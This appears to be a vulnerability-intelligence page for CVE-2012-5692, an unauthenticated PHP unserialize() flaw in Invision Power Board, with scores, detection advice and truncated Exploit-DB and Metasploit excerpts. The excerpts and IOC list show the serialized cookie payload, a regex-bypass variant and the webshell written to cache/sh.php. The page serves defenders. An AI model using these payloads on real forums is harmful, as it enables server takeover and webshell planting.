CVE-2012-5692
published 2012-10-31CVE-2012-5692: Unspecified vulnerability in admin/sources/base/core.php in Invision Power Board (aka IPB or IP.Board) 3.1.x through 3.3.x has unknown impact and remote attack…
PriorityP261critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
24.91%
97.6th percentile
Unspecified vulnerability in admin/sources/base/core.php in Invision Power Board (aka IPB or IP.Board) 3.1.x through 3.3.x has unknown impact and remote attack vectors.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| invisioncommunity | invision_power_board | — | — |
| invisioncommunity | invision_power_board | — | — |
| invisionpower | invision_power_board | — | — |
| invisionpower | invision_power_board | — | — |
| invisionpower | invision_power_board | — | — |
| invisionpower | invision_power_board | — | — |
| invisionpower | invision_power_board | — | — |
| invisionpower | invision_power_board | — | — |
| invisionpower | invision_power_board | — | — |
Detection & IOCsextracted from sources · hover to see the quote
cookiemember_id=a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}↗
- →Detect exploitation attempts via the member_id cookie containing a serialized PHP object payload targeting the db_driver_mysql class with use_debug_log and debug_log keys. ↗
- →Alert on GET requests to index.php accompanied by a member_id cookie value containing PHP serialization syntax (e.g., 'O:+15:"db_driver_mysql"' or 'O:15:"db_driver_mysql"'), indicating unserialize regex bypass attempts. ↗
- →Monitor for creation of or GET requests to files under the cache/ directory with a .php extension, as the exploit writes a webshell to cache/sh.php or a random-named .php file in cache/. ↗
- →Detect HTTP requests to cache/*.php that include a 'Cmd:' header, which is the webshell command execution mechanism used by the exploit. ↗
- →The exploit abuses the __destruct() method from the dbMain class to write arbitrary PHP code; monitor for unexpected PHP file creation in the IPB web directory's cache/ folder. ↗
- ·The regex bypass variant uses 'O:+15:' (with a leading plus sign) to evade unserialize input validation; detection signatures must account for both 'O:15:' and 'O:+15:' serialized object prefixes. ↗
- ·The Metasploit module uses a randomly named PHP file (rand_text_alpha) in the cache/ directory rather than the fixed 'sh.php' name; file-name-based detection alone is insufficient. ↗
- ·The vulnerability is exploitable unauthenticated; no session or login is required, so authentication-based controls do not mitigate the attack vector. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution (Metasploit)
exploitdb·2012-11-13
CVE-2012-5692 Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution (Metasploit)
Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'Invision IP.Board %q{
This module exploits a php unserialize() vulnerability in Invision IP.Board
[
'EgiX', # Vulnerability discovery and PoC
'juan vazquez', # Metasploit module
'sinn3r' # PhpEXE tekniq & check() method
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-5692' ],
[ 'OSVDB', '86702' ],
[ 'BID', '56288' ],
[ 'EDB', '22398' ],
[ 'URL', 'http://community.invisionpower.com/topic/371625-ipboard-31x-32x-an
Exploit-DB
Invision Power Board (IP.Board) 3.3.4 - Unserialize Regex Bypass
exploitdb·2012-11-07
CVE-2012-5692 Invision Power Board (IP.Board) 3.3.4 - Unserialize Regex Bypass
Invision Power Board (IP.Board) 3.3.4 - Unserialize Regex Bypass
---
\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /ipb/\n";
die();
}
list($host, $path) = array($argv[1], $argv[2]);
$packet = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : '';
class db_driver_mysql
{
public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
}
# Super bypass by @i0n1c
$payload = urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}');
$phpcode = '';
$packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet
Exploit-DB
Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution
exploitdb·2012-11-01
CVE-2012-5692 Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution
Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution
---
\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /ipb/\n";
die();
}
list($host, $path) = array($argv[1], $argv[2]);
$packet = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : '';
class db_driver_mysql
{
public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
}
$payload = urlencode(serialize(array(new db_driver_mysql)));
$phpcode = '';
$packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
$packet .= "C
Metasploit
Invision IP.Board unserialize() PHP Code Execution
metasploit
Invision IP.Board unserialize() PHP Code Execution
Invision IP.Board unserialize() PHP Code Execution
This module exploits a php unserialize() vulnerability in Invision IP.Board <= 3.3.4 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the webserver user. The dangerous unserialize() exists in the '/admin/sources/base/core.php' script, which is called with user controlled data from the cookie. The exploit abuses the __destruct() method from the dbMain class to write arbitrary PHP code to a file on the Invision IP.Board web directory. The exploit has been tested successfully on Invision IP.Board 3.3.4.
No writeups or analysis indexed.
http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-security-update/http://secunia.com/advisories/51104http://www.securityfocus.com/bid/56288http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-security-update/http://secunia.com/advisories/51104http://www.securityfocus.com/bid/56288
2012-10-31
Published